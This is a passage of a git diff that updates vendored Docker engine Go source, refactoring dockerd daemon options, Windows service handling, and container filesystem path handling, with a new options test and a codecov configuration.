+	// On Windows, this may be launching as a service or with an option to
+	// register the service.
+	stop, runAsService, err := initService(daemonCli)
+	if err != nil {
+		logrus.Fatal(err)
+	}
 
-func init() {
-	// Ensure that this import is not removed by the linker. This is used to
-	// ensure that shell32.dll is loaded by the system loader, preventing
-	// go#15286 from triggering on Nano Server TP5.
-	atomic.LoadUintptr(&dummy)
+	if stop {
+		return nil
+	}
+
+	// Windows specific settings as these are not defaulted.
+	if opts.configFile == "" {
+		opts.configFile = filepath.Join(opts.daemonConfig.Root, `config\daemon.json`)
+	}
+	if runAsService {
+		// If Windows SCM manages the service - no need for PID files
+		opts.daemonConfig.Pidfile = ""
+	} else if opts.daemonConfig.Pidfile == "" {
+		opts.daemonConfig.Pidfile = filepath.Join(opts.daemonConfig.Root, "docker.pid")
+	}
+
+	err = daemonCli.start(opts)
+	notifyShutdown(err)
+	return err
 }
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go
index d4aa3ddd73..ddd5eb9d8b 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package hack
+package hack // import "github.com/docker/docker/cmd/dockerd/hack"
 
 import "net"
 
@@ -111,7 +111,7 @@ func (l *MalformedHostHeaderOverrideConn) Read(b []byte) (n int, err error) {
 }
 
 // Accept makes the listener accepts connections and wraps the connection
-// in a MalformedHostHeaderOverrideConn initilizing first to true.
+// in a MalformedHostHeaderOverrideConn initializing first to true.
 func (l *MalformedHostHeaderOverride) Accept() (net.Conn, error) {
 	c, err := l.Listener.Accept()
 	if err != nil {
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go
index 1a0a60baf3..6874b059be 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package hack
+package hack // import "github.com/docker/docker/cmd/dockerd/hack"
 
 import (
 	"bytes"
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/metrics.go b/vendor/github.com/docker/docker/cmd/dockerd/metrics.go
index 0c8860408b..20ceaf8466 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/metrics.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/metrics.go
@@ -4,8 +4,8 @@ import (
 	"net"
 	"net/http"
 
-	"github.com/Sirupsen/logrus"
-	metrics "github.com/docker/go-metrics"
+	"github.com/docker/go-metrics"
+	"github.com/sirupsen/logrus"
 )
 
 func startMetricsServer(addr string) error {
diff --git a/vendor/github.com/docker/docker/cli/flags/common.go b/vendor/github.com/docker/docker/cmd/dockerd/options.go
similarity index 56%
rename from vendor/github.com/docker/docker/cli/flags/common.go
rename to vendor/github.com/docker/docker/cmd/dockerd/options.go
index e2f9da0732..a6276add59 100644
--- a/vendor/github.com/docker/docker/cli/flags/common.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/options.go
@@ -1,27 +1,26 @@
-package flags
+package main
 
 import (
 	"fmt"
 	"os"
 	"path/filepath"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/cliconfig"
+	cliconfig "github.com/docker/docker/cli/config"
+	"github.com/docker/docker/daemon/config"
 	"github.com/docker/docker/opts"
 	"github.com/docker/go-connections/tlsconfig"
+	"github.com/sirupsen/logrus"
 	"github.com/spf13/pflag"
 )
 
 const (
-	// DefaultTrustKeyFile is the default filename for the trust key
-	DefaultTrustKeyFile = "key.json"
 	// DefaultCaFile is the default filename for the CA pem file
 	DefaultCaFile = "ca.pem"
 	// DefaultKeyFile is the default filename for the key pem file
 	DefaultKeyFile = "key.pem"
 	// DefaultCertFile is the default filename for the cert pem file
 	DefaultCertFile = "cert.pem"
-	// FlagTLSVerify is the flag name for the tls verification option
+	// FlagTLSVerify is the flag name for the TLS verification option
 	FlagTLSVerify = "tlsverify"
 )
 
@@ -30,65 +29,68 @@ var (
 	dockerTLSVerify = os.Getenv("DOCKER_TLS_VERIFY") != ""
 )
 
-// CommonOptions are options common to both the client and the daemon.
-type CommonOptions struct {
-	Debug      bool
-	Hosts      []string
-	LogLevel   string
-	TLS        bool
-	TLSVerify  bool
-	TLSOptions *tlsconfig.Options
-	TrustKey   string
+type daemonOptions struct {
+	configFile   string
+	daemonConfig *config.Config
+	flags        *pflag.FlagSet
+	Debug        bool
+	Hosts        []string
+	LogLevel     string
+	TLS          bool
+	TLSVerify    bool
+	TLSOptions   *tlsconfig.Options
 }
 
-// NewCommonOptions returns a new CommonOptions
-func NewCommonOptions() *CommonOptions {
-	return &CommonOptions{}
+// newDaemonOptions returns a new daemonFlags
+func newDaemonOptions(config *config.Config) *daemonOptions {
+	return &daemonOptions{
+		daemonConfig: config,
+	}
 }
 
 // InstallFlags adds flags for the common options on the FlagSet
-func (commonOpts *CommonOptions) InstallFlags(flags *pflag.FlagSet) {
+func (o *daemonOptions) InstallFlags(flags *pflag.FlagSet) {
 	if dockerCertPath == "" {
-		dockerCertPath = cliconfig.ConfigDir()
+		dockerCertPath = cliconfig.Dir()
 	}
 
-	flags.BoolVarP(&commonOpts.Debug, "debug", "D", false, "Enable debug mode")
-	flags.StringVarP(&commonOpts.LogLevel, "log-level", "l", "info", "Set the logging level (\"debug\", \"info\", \"warn\", \"error\", \"fatal\")")
-	flags.BoolVar(&commonOpts.TLS, "tls", false, "Use TLS; implied by --tlsverify")
-	flags.BoolVar(&commonOpts.TLSVerify, FlagTLSVerify, dockerTLSVerify, "Use TLS and verify the remote")
+	flags.BoolVarP(&o.Debug, "debug", "D", false, "Enable debug mode")
+	flags.StringVarP(&o.LogLevel, "log-level", "l", "info", `Set the logging level ("debug"|"info"|"warn"|"error"|"fatal")`)
+	flags.BoolVar(&o.TLS, "tls", false, "Use TLS; implied by --tlsverify")
+	flags.BoolVar(&o.TLSVerify, FlagTLSVerify, dockerTLSVerify, "Use TLS and verify the remote")
 
 	// TODO use flag flags.String("identity"}, "i", "", "Path to libtrust key file")
 
-	commonOpts.TLSOptions = &tlsconfig.Options{
+	o.TLSOptions = &tlsconfig.Options{
 		CAFile:   filepath.Join(dockerCertPath, DefaultCaFile),
 		CertFile: filepath.Join(dockerCertPath, DefaultCertFile),
 		KeyFile:  filepath.Join(dockerCertPath, DefaultKeyFile),
 	}
-	tlsOptions := commonOpts.TLSOptions
+	tlsOptions := o.TLSOptions
 	flags.Var(opts.NewQuotedString(&tlsOptions.CAFile), "tlscacert", "Trust certs signed only by this CA")
 	flags.Var(opts.NewQuotedString(&tlsOptions.CertFile), "tlscert", "Path to TLS certificate file")
 	flags.Var(opts.NewQuotedString(&tlsOptions.KeyFile), "tlskey", "Path to TLS key file")
 
-	hostOpt := opts.NewNamedListOptsRef("hosts", &commonOpts.Hosts, opts.ValidateHost)
+	hostOpt := opts.NewNamedListOptsRef("hosts", &o.Hosts, opts.ValidateHost)
 	flags.VarP(hostOpt, "host", "H", "Daemon socket(s) to connect to")
 }
 
 // SetDefaultOptions sets default values for options after flag parsing is
 // complete
-func (commonOpts *CommonOptions) SetDefaultOptions(flags *pflag.FlagSet) {
+func (o *daemonOptions) SetDefaultOptions(flags *pflag.FlagSet) {
 	// Regardless of whether the user sets it to true or false, if they
-	// specify --tlsverify at all then we need to turn on tls
+	// specify --tlsverify at all then we need to turn on TLS
 	// TLSVerify can be true even if not set due to DOCKER_TLS_VERIFY env var, so we need
 	// to check that here as well
-	if flags.Changed(FlagTLSVerify) || commonOpts.TLSVerify {
-		commonOpts.TLS = true
+	if flags.Changed(FlagTLSVerify) || o.TLSVerify {
+		o.TLS = true
 	}
 
-	if !commonOpts.TLS {
-		commonOpts.TLSOptions = nil
+	if !o.TLS {
+		o.TLSOptions = nil
 	} else {
-		tlsOptions := commonOpts.TLSOptions
-		tlsOptions.InsecureSkipVerify = !commonOpts.TLSVerify
+		tlsOptions := o.TLSOptions
+		tlsOptions.InsecureSkipVerify = !o.TLSVerify
 
 		// Reset CertFile and KeyFile to empty string if the user did not specify
 		// the respective flags and the respective default files were not found.
@@ -105,8 +107,8 @@ func (commonOpts *CommonOptions) SetDefaultOptions(flags *pflag.FlagSet) {
 	}
 }
 
-// SetLogLevel sets the logrus logging level
-func SetLogLevel(logLevel string) {
+// setLogLevel sets the logrus logging level
+func setLogLevel(logLevel string) {
 	if logLevel != "" {
 		lvl, err := logrus.ParseLevel(logLevel)
 		if err != nil {
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/options_test.go b/vendor/github.com/docker/docker/cmd/dockerd/options_test.go
new file mode 100644
index 0000000000..691118f08f
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/options_test.go
@@ -0,0 +1,44 @@
+package main
+
+import (
+	"path/filepath"
+	"testing"
+
+	cliconfig "github.com/docker/docker/cli/config"
+	"github.com/docker/docker/daemon/config"
+	"github.com/spf13/pflag"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestCommonOptionsInstallFlags(t *testing.T) {
+	flags := pflag.NewFlagSet("testing", pflag.ContinueOnError)
+	opts := newDaemonOptions(&config.Config{})
+	opts.InstallFlags(flags)
+
+	err := flags.Parse([]string{
+		"--tlscacert=\"/foo/cafile\"",
+		"--tlscert=\"/foo/cert\"",
+		"--tlskey=\"/foo/key\"",
+	})
+	assert.Check(t, err)
+	assert.Check(t, is.Equal("/foo/cafile", opts.TLSOptions.CAFile))
+	assert.Check(t, is.Equal("/foo/cert", opts.TLSOptions.CertFile))
+	assert.Check(t, is.Equal(opts.TLSOptions.KeyFile, "/foo/key"))
+}
+
+func defaultPath(filename string) string {
+	return filepath.Join(cliconfig.Dir(), filename)
+}
+
+func TestCommonOptionsInstallFlagsWithDefaults(t *testing.T) {
+	flags := pflag.NewFlagSet("testing", pflag.ContinueOnError)
+	opts := newDaemonOptions(&config.Config{})
+	opts.InstallFlags(flags)
+
+	err := flags.Parse([]string{})
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(defaultPath("ca.pem"), opts.TLSOptions.CAFile))
+	assert.Check(t, is.Equal(defaultPath("cert.pem"), opts.TLSOptions.CertFile))
+	assert.Check(t, is.Equal(defaultPath("key.pem"), opts.TLSOptions.KeyFile))
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go b/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go
index 64ad7fcaa0..bbcb7f3f3b 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go
@@ -6,9 +6,5 @@ import (
 	"github.com/spf13/pflag"
 )
 
-func initService(daemonCli *DaemonCli) (bool, error) {
-	return false, nil
-}
-
 func installServiceFlags(flags *pflag.FlagSet) {
 }
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go
index dd37abcf3c..00432af643 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go
@@ -5,15 +5,15 @@ import (
 	"errors"
 	"fmt"
 	"io/ioutil"
+	"log"
 	"os"
 	"os/exec"
 	"path/filepath"
-	"syscall"
 	"time"
 	"unsafe"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/system"
+	"github.com/sirupsen/logrus"
 	"github.com/spf13/pflag"
 	"golang.org/x/sys/windows"
 	"golang.org/x/sys/windows/svc"
@@ -29,7 +29,7 @@ var (
 	flRunService        *bool
 
 	setStdHandle = windows.NewLazySystemDLL("kernel32.dll").NewProc("SetStdHandle")
-	oldStderr    syscall.Handle
+	oldStderr    windows.Handle
 	panicFile    *os.File
 
 	service *handler
@@ -130,14 +130,14 @@ func (h *etwHook) Fire(e *logrus.Entry) error {
 		err error
 	)
 
-	ss[0], err = syscall.UTF16PtrFromString(e.Message)
+	ss[0], err = windows.UTF16PtrFromString(e.Message)
 	if err != nil {
 		return err
 	}
 
 	count := uint16(1)
 	if exts != "" {
-		ss[1], err = syscall.UTF16PtrFromString(exts)
+		ss[1], err = windows.UTF16PtrFromString(exts)
 		if err != nil {
 			return err
 		}
@@ -230,12 +230,7 @@ func registerService() error {
 		return err
 	}
 
-	err = eventlog.Install(*flServiceName, p, false, eventlog.Info|eventlog.Warning|eventlog.Error)
-	if err != nil {
-		return err
-	}
-
-	return nil
+	return eventlog.Install(*flServiceName, p, false, eventlog.Info|eventlog.Warning|eventlog.Error)
 }
 
 func unregisterService() error {
@@ -259,25 +254,28 @@ func unregisterService() error {
 	return nil
 }
 
-func initService(daemonCli *DaemonCli) (bool, error) {
+// initService is the entry point for running the daemon as a Windows
+// service. It returns an indication to stop (if registering/un-registering);
+// an indication of whether it is running as a service; and an error.
+func initService(daemonCli *DaemonCli) (bool, bool, error) {
 	if *flUnregisterService {
 		if *flRegisterService {
-			return true, errors.New("--register-service and --unregister-service cannot be used together")
+			return true, false, errors.New("--register-service and --unregister-service cannot be used together")
 		}
-		return true, unregisterService()
+		return true, false, unregisterService()
 	}
 
 	if *flRegisterService {
-		return true, registerService()
+		return true, false, registerService()
 	}
 
 	if !*flRunService {
-		return false, nil
+		return false, false, nil
 	}
 
 	interactive, err := svc.IsAnInteractiveSession()
 	if err != nil {
-		return false, err
+		return false, false, err
 	}
 
 	h := &handler{
@@ -290,7 +288,7 @@ func initService(daemonCli *DaemonCli) (bool, error) {
 	if !interactive {
 		log, err = eventlog.Open(*flServiceName)
 		if err != nil {
-			return false, err
+			return false, false, err
 		}
 	}
 
@@ -311,9 +309,9 @@ func initService(daemonCli *DaemonCli) (bool, error) {
 	// Wait for the first signal from the service handler.
 	err = <-h.fromsvc
 	if err != nil {
-		return false, err
+		return false, false, err
 	}
-	return false, nil
+	return false, true, nil
 }
 
 func (h *handler) started() error {
@@ -398,8 +396,8 @@ func initPanicFile(path string) error {
 	// Update STD_ERROR_HANDLE to point to the panic file so that Go writes to
 	// it when it panics. Remember the old stderr to restore it before removing
 	// the panic file.
-	sh := syscall.STD_ERROR_HANDLE
-	h, err := syscall.GetStdHandle(sh)
+	sh := windows.STD_ERROR_HANDLE
+	h, err := windows.GetStdHandle(uint32(sh))
 	if err != nil {
 		return err
 	}
@@ -411,13 +409,19 @@ func initPanicFile(path string) error {
 		return err
 	}
 
+	// Reset os.Stderr to the panic file (so fmt.Fprintf(os.Stderr,...) actually gets redirected)
+	os.Stderr = os.NewFile(uintptr(panicFile.Fd()), "/dev/stderr")
+
+	// Force threads that panic to write to stderr (the panicFile handle now), otherwise it will go into the ether
+	log.SetOutput(os.Stderr)
+
 	return nil
 }
 
 func removePanicFile() {
 	if st, err := panicFile.Stat(); err == nil {
 		if st.Size() == 0 {
-			sh := syscall.STD_ERROR_HANDLE
+			sh := windows.STD_ERROR_HANDLE
 			setStdHandle.Call(uintptr(sh), uintptr(oldStderr))
 			panicFile.Close()
 			os.Remove(panicFile.Name())
diff --git a/vendor/github.com/docker/docker/codecov.yml b/vendor/github.com/docker/docker/codecov.yml
new file mode 100644
index 0000000000..594265c6cf
--- /dev/null
+++ b/vendor/github.com/docker/docker/codecov.yml
@@ -0,0 +1,17 @@
+comment:
+  layout: header, changes, diff, sunburst
+coverage:
+  status:
+    patch:
+      default:
+        target: 50%
+        only_pulls: true
+    # project will give us the diff in the total code coverage between a commit
+    # and its parent
+    project:
+      default:
+        target: auto
+        threshold: "15%"
+    changes: false
+ignore:
+  - "vendor/*"
diff --git a/vendor/github.com/docker/docker/container/archive.go b/vendor/github.com/docker/docker/container/archive.go
index 56e6598b9c..ed72c4a405 100644
--- a/vendor/github.com/docker/docker/container/archive.go
+++ b/vendor/github.com/docker/docker/container/archive.go
@@ -1,12 +1,12 @@
-package container
+package container // import "github.com/docker/docker/container"
 
 import (
 	"os"
-	"path/filepath"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/pkg/archive"
 	"github.com/docker/docker/pkg/system"
+	"github.com/pkg/errors"
 )
 
 // ResolvePath resolves the given path in the container to a resource on the
@@ -14,18 +14,24 @@ import (
 // the absolute path to the resource relative to the container's rootfs, and
 // an error if the path points to outside the container's rootfs.
 func (container *Container) ResolvePath(path string) (resolvedPath, absPath string, err error) {
+	if container.BaseFS == nil {
+		return "", "", errors.New("ResolvePath: BaseFS of container " + container.ID + " is unexpectedly nil")
+	}
 	// Check if a drive letter supplied, it must be the system drive. No-op except on Windows
-	path, err = system.CheckSystemDriveAndRemoveDriveLetter(path)
+	path, err = system.CheckSystemDriveAndRemoveDriveLetter(path, container.BaseFS)
 	if err != nil {
 		return "", "", err
 	}
 
 	// Consider the given path as an absolute path in the container.
-	absPath = archive.PreserveTrailingDotOrSeparator(filepath.Join(string(filepath.Separator), path), path)
+	absPath = archive.PreserveTrailingDotOrSeparator(
+		container.BaseFS.Join(string(container.BaseFS.Separator()), path),
+		path,
+		container.BaseFS.Separator())
 
 	// Split the absPath into its Directory and Base components. We will
 	// resolve the dir in the scope of the container then append the base.
-	dirPath, basePath := filepath.Split(absPath)
+	dirPath, basePath := container.BaseFS.Split(absPath)
 
 	resolvedDirPath, err := container.GetResourcePath(dirPath)
 	if err != nil {
@@ -34,8 +40,7 @@ func (container *Container) ResolvePath(path string) (resolvedPath, absPath stri
 
 	// resolvedDirPath will have been cleaned (no trailing path separators) so
 	// we can manually join it with the base path element.
-	resolvedPath = resolvedDirPath + string(filepath.Separator) + basePath
-
+	resolvedPath = resolvedDirPath + string(container.BaseFS.Separator()) + basePath
 	return resolvedPath, absPath, nil
 }
 
@@ -44,7 +49,12 @@ func (container *Container) ResolvePath(path string) (resolvedPath, absPath stri
 // resolved to a path on the host corresponding to the given absolute path
 // inside the container.
 func (container *Container) StatPath(resolvedPath, absPath string) (stat *types.ContainerPathStat, err error) {
-	lstat, err := os.Lstat(resolvedPath)
+	if container.BaseFS == nil {
+		return nil, errors.New("StatPath: BaseFS of container " + container.ID + " is unexpectedly nil")
+	}
+	driver := container.BaseFS
+
+	lstat, err := driver.Lstat(resolvedPath)
 	if err != nil {
 		return nil, err
 	}
@@ -57,17 +67,17 @@ func (container *Container) StatPath(resolvedPath, absPath string) (stat *types.
 			return nil, err
 		}
 
-		linkTarget, err = filepath.Rel(container.BaseFS, hostPath)
+		linkTarget, err = driver.Rel(driver.Path(), hostPath)
 		if err != nil {
 			return nil, err
 		}
 
 		// Make it an absolute path.
-		linkTarget = filepath.Join(string(filepath.Separator), linkTarget)
+		linkTarget = driver.Join(string(driver.Separator()), linkTarget)
 	}
 
 	return &types.ContainerPathStat{
-		Name:       filepath.Base(absPath),
+		Name:       driver.Base(absPath),
 		Size:       lstat.Size(),
 		Mode:       lstat.Mode(),
 		Mtime:      lstat.ModTime(),
diff --git a/vendor/github.com/docker/docker/container/container.go b/vendor/github.com/docker/docker/container/container.go
index fc4fe2717f..5f31d8df12 100644
--- a/vendor/github.com/docker/docker/container/container.go
+++ b/vendor/github.com/docker/docker/container/container.go
@@ -1,24 +1,22 @@
-package container
+package container // import "github.com/docker/docker/container"
 
 import (
+	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io"
-	"net"
 	"os"
 	"path/filepath"
-	"strconv"
+	"runtime"
 	"strings"
 	"sync"
 	"syscall"
 	"time"
 
-	"golang.org/x/net/context"
-
-	"github.com/Sirupsen/logrus"
+	"github.com/containerd/containerd/cio"
 	containertypes "github.com/docker/docker/api/types/container"
 	mounttypes "github.com/docker/docker/api/types/mount"
-	networktypes "github.com/docker/docker/api/types/network"
 	swarmtypes "github.com/docker/docker/api/types/swarm"
 	"github.com/docker/docker/container/stream"
 	"github.com/docker/docker/daemon/exec"
@@ -27,53 +25,43 @@ import (
 	"github.com/docker/docker/daemon/network"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
-	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/docker/pkg/promise"
 	"github.com/docker/docker/pkg/signal"
 	"github.com/docker/docker/pkg/symlink"
+	"github.com/docker/docker/pkg/system"
 	"github.com/docker/docker/restartmanager"
-	"github.com/docker/docker/runconfig"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
 	"github.com/docker/docker/volume"
-	"github.com/docker/go-connections/nat"
-	"github.com/docker/libnetwork"
-	"github.com/docker/libnetwork/netlabel"
-	"github.com/docker/libnetwork/options"
-	"github.com/docker/libnetwork/types"
+	volumemounts "github.com/docker/docker/volume/mounts"
+	"github.com/docker/go-units"
 	agentexec "github.com/docker/swarmkit/agent/exec"
-	"github.com/opencontainers/runc/libcontainer/label"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 const configFileName = "config.v2.json"
 
-const (
-	// DefaultStopTimeout is the timeout (in seconds) for the syscall signal used to stop a container.
-	DefaultStopTimeout = 10
-)
+// ExitStatus provides exit reasons for a container.
+type ExitStatus struct {
+	// The exit code with which the container exited.
+	ExitCode int
 
-var (
-	errInvalidEndpoint = fmt.Errorf("invalid endpoint while building port map info")
-	errInvalidNetwork  = fmt.Errorf("invalid network settings while building port map info")
-)
+	// Whether the container encountered an OOM.
+	OOMKilled bool
 
-// DetachError is special error which returned in case of container detach.
-type DetachError struct{}
-
-func (DetachError) Error() string {
-	return "detached from container"
+	// Time at which the container died
+	ExitedAt time.Time
 }
 
-// CommonContainer holds the fields for a container which are
-// applicable across all platforms supported by the daemon.
-type CommonContainer struct {
+// Container holds the structure defining a container object.
+type Container struct {
 	StreamConfig *stream.Config
 	// embed for Container to support states directly.
-	*State          `json:"State"` // Needed for Engine API version <= 1.11
-	Root            string         `json:"-"` // Path to the "home" of the container, including metadata.
-	BaseFS          string         `json:"-"` // Path to the graphdriver mountpoint
-	RWLayer         layer.RWLayer  `json:"-"`
+	*State          `json:"State"`          // Needed for Engine API version <= 1.11
+	Root            string                  `json:"-"` // Path to the "home" of the container, including metadata.
+	BaseFS          containerfs.ContainerFS `json:"-"` // interface containing graphdriver mount
+	RWLayer         layer.RWLayer           `json:"-"`
 	ID              string
 	Created         time.Time
 	Managed         bool
@@ -85,37 +73,50 @@ type CommonContainer struct {
 	LogPath         string
 	Name            string
 	Driver          string
+	OS              string
 	// MountLabel contains the options for the 'mount' command
 	MountLabel             string
 	ProcessLabel           string
 	RestartCount           int
 	HasBeenStartedBefore   bool
 	HasBeenManuallyStopped bool // used for unless-stopped restart policy
-	MountPoints            map[string]*volume.MountPoint
+	MountPoints            map[string]*volumemounts.MountPoint
 	HostConfig             *containertypes.HostConfig `json:"-"` // do not serialize the host config in the json, otherwise we'll make the container unportable
 	ExecCommands           *exec.Store                `json:"-"`
-	SecretStore            agentexec.SecretGetter     `json:"-"`
+	DependencyStore        agentexec.DependencyGetter `json:"-"`
 	SecretReferences       []*swarmtypes.SecretReference
+	ConfigReferences       []*swarmtypes.ConfigReference
 	// logDriver for closing
 	LogDriver      logger.Logger  `json:"-"`
 	LogCopier      *logger.Copier `json:"-"`
 	restartManager restartmanager.RestartManager
 	attachContext  *attachContext
+
+	// Fields here are specific to Unix platforms
+	AppArmorProfile string
+	HostnamePath    string
+	HostsPath       string
+	ShmPath         string
+	ResolvConfPath  string
+	SeccompProfile  string
+	NoNewPrivileges bool
+
+	// Fields here are specific to Windows
+	NetworkSharedContainerID string   `json:"-"`
+	SharedEndpointList       []string `json:"-"`
 }
 
 // NewBaseContainer creates a new container with its
 // basic configuration.
 func NewBaseContainer(id, root string) *Container {
 	return &Container{
-		CommonContainer: CommonContainer{
-			ID:            id,
-			State:         NewState(),
-			ExecCommands:  exec.NewStore(),
-			Root:          root,
-			MountPoints:   make(map[string]*volume.MountPoint),
-			StreamConfig:  stream.NewConfig(),
-			attachContext: &attachContext{},
-		},
+		ID:            id,
+		State:         NewState(),
+		ExecCommands:  exec.NewStore(),
+		Root:          root,
+		MountPoints:   make(map[string]*volumemounts.MountPoint),
+		StreamConfig:  stream.NewConfig(),
+		attachContext: &attachContext{},
 	}
 }
 
@@ -139,41 +140,58 @@ func (container *Container) FromDisk() error {
 		return err
 	}
 
-	if err := label.ReserveLabel(container.ProcessLabel); err != nil {
-		return err
+	// Ensure the operating system is set if blank. Assume it is the OS of the
+	// host OS if not, to ensure containers created before multiple-OS
+	// support are migrated
+	if container.OS == "" {
+		container.OS = runtime.GOOS
 	}
+
 	return container.readHostConfig()
 }
 
-// ToDisk saves the container configuration on disk.
-func (container *Container) ToDisk() error {
+// toDisk saves the container configuration on disk and returns a deep copy.
+func (container *Container) toDisk() (*Container, error) {
+	var (
+		buf      bytes.Buffer
+		deepCopy Container
+	)
 	pth, err := container.ConfigPath()
 	if err != nil {
-		return err
+		return nil, err
 	}
 
-	jsonSource, err := ioutils.NewAtomicFileWriter(pth, 0644)
+	// Save container settings
+	f, err := ioutils.NewAtomicFileWriter(pth, 0600)
 	if err != nil {
-		return err
+		return nil, err
 	}
-	defer jsonSource.Close()
+	defer f.Close()
 
-	enc := json.NewEncoder(jsonSource)
+	w := io.MultiWriter(&buf, f)
+	if err := json.NewEncoder(w).Encode(container); err != nil {
+		return nil, err
+	}
 
-	// Save container settings
-	if err := enc.Encode(container); err != nil {
-		return err
+	if err := json.NewDecoder(&buf).Decode(&deepCopy); err != nil {
+		return nil, err
+	}
+	deepCopy.HostConfig, err = container.WriteHostConfig()
+	if err != nil {
+		return nil, err
 	}
 
-	return container.WriteHostConfig()
+	return &deepCopy, nil
 }
 
-// ToDiskLocking saves the container configuration on disk in a thread safe way.
-func (container *Container) ToDiskLocking() error {
-	container.Lock()
-	err := container.ToDisk()
-	container.Unlock()
-	return err
+// CheckpointTo makes the Container's current state visible to queries, and persists state.
+// Callers must hold a Container lock.
+func (container *Container) CheckpointTo(store ViewDB) error {
+	deepCopy, err := container.toDisk()
+	if err != nil {
+		return err
+	}
+	return store.Save(deepCopy)
 }
 
 // readHostConfig reads the host configuration from disk for the container.
@@ -205,39 +223,58 @@ func (container *Container) readHostConfig() error {
 	return nil
 }
 
-// WriteHostConfig saves the host configuration on disk for the container.
-func (container *Container) WriteHostConfig() error {
+// WriteHostConfig saves the host configuration on disk for the container,
+// and returns a deep copy of the saved object. Callers must hold a Container lock.
+func (container *Container) WriteHostConfig() (*containertypes.HostConfig, error) {
+	var (
+		buf      bytes.Buffer
+		deepCopy containertypes.HostConfig
+	)
+
 	pth, err := container.HostConfigPath()
 	if err != nil {
-		return err
+		return nil, err
 	}
 
 	f, err := ioutils.NewAtomicFileWriter(pth, 0644)
 	if err != nil {
-		return err
+		return nil, err
 	}
 	defer f.Close()
 
-	return json.NewEncoder(f).Encode(&container.HostConfig)
+	w := io.MultiWriter(&buf, f)
+	if err := json.NewEncoder(w).Encode(&container.HostConfig); err != nil {
+		return nil, err
+	}
+
+	if err := json.NewDecoder(&buf).Decode(&deepCopy); err != nil {
+		return nil, err
+	}
+	return &deepCopy, nil
 }
 
 // SetupWorkingDirectory sets up the container's working directory as set in container.Config.WorkingDir
-func (container *Container) SetupWorkingDirectory(rootUID, rootGID int) error {
+func (container *Container) SetupWorkingDirectory(rootIDs idtools.IDPair) error {
+	// TODO @jhowardmsft, @gupta-ak LCOW Support. This will need revisiting.
+	// We will need to do remote filesystem operations here.
+	if container.OS != runtime.GOOS {
+		return nil
+	}
+
 	if container.Config.WorkingDir == "" {
 		return nil
 	}
 
 	container.Config.WorkingDir = filepath.Clean(container.Config.WorkingDir)
-
 	pth, err := container.GetResourcePath(container.Config.WorkingDir)
 	if err != nil {
 		return err
 	}
 
-	if err := idtools.MkdirAllNewAs(pth, 0755, rootUID, rootGID); err != nil {
+	if err := idtools.MkdirAllAndChownNew(pth, 0755, rootIDs); err != nil {
 		pthInfo, err2 := os.Stat(pth)
 		if err2 == nil && pthInfo != nil && !pthInfo.IsDir() {
-			return fmt.Errorf("Cannot mkdir: %s is not a directory", container.Config.WorkingDir)
+			return errors.Errorf("Cannot mkdir: %s is not a directory", container.Config.WorkingDir)
 		}
 
 		return err
@@ -260,17 +297,18 @@ func (container *Container) SetupWorkingDirectory(rootUID, rootGID int) error {
 //       symlinking to a different path) between using this method and using the
 //       path. See symlink.FollowSymlinkInScope for more details.
 func (container *Container) GetResourcePath(path string) (string, error) {
+	if container.BaseFS == nil {
+		return "", errors.New("GetResourcePath: BaseFS of container " + container.ID + " is unexpectedly nil")
+	}
 	// IMPORTANT - These are paths on the OS where the daemon is running, hence
 	// any filepath operations must be done in an OS agnostic way.
-
-	cleanPath := cleanResourcePath(path)
-	r, e := symlink.FollowSymlinkInScope(filepath.Join(container.BaseFS, cleanPath), container.BaseFS)
+	r, e := container.BaseFS.ResolveScopedPath(path, false)
 
 	// Log this here on the daemon side as there's otherwise no indication apart
 	// from the error being propagated all the way back to the client. This makes
 	// debugging significantly easier and clearly indicates the error comes from the daemon.
 	if e != nil {
-		logrus.Errorf("Failed to FollowSymlinkInScope BaseFS %s cleanPath %s path %s %s\n", container.BaseFS, cleanPath, path, e)
+		logrus.Errorf("Failed to ResolveScopedPath BaseFS %s path %s %s\n", container.BaseFS.Path(), path, e)
 	}
 	return r, e
 }
@@ -316,12 +354,13 @@ func (container *Container) CheckpointDir() string {
 }
 
 // StartLogger starts a new logger driver for the container.
-func (container *Container) StartLogger(cfg containertypes.LogConfig) (logger.Logger, error) {
-	c, err := logger.GetLogDriver(cfg.Type)
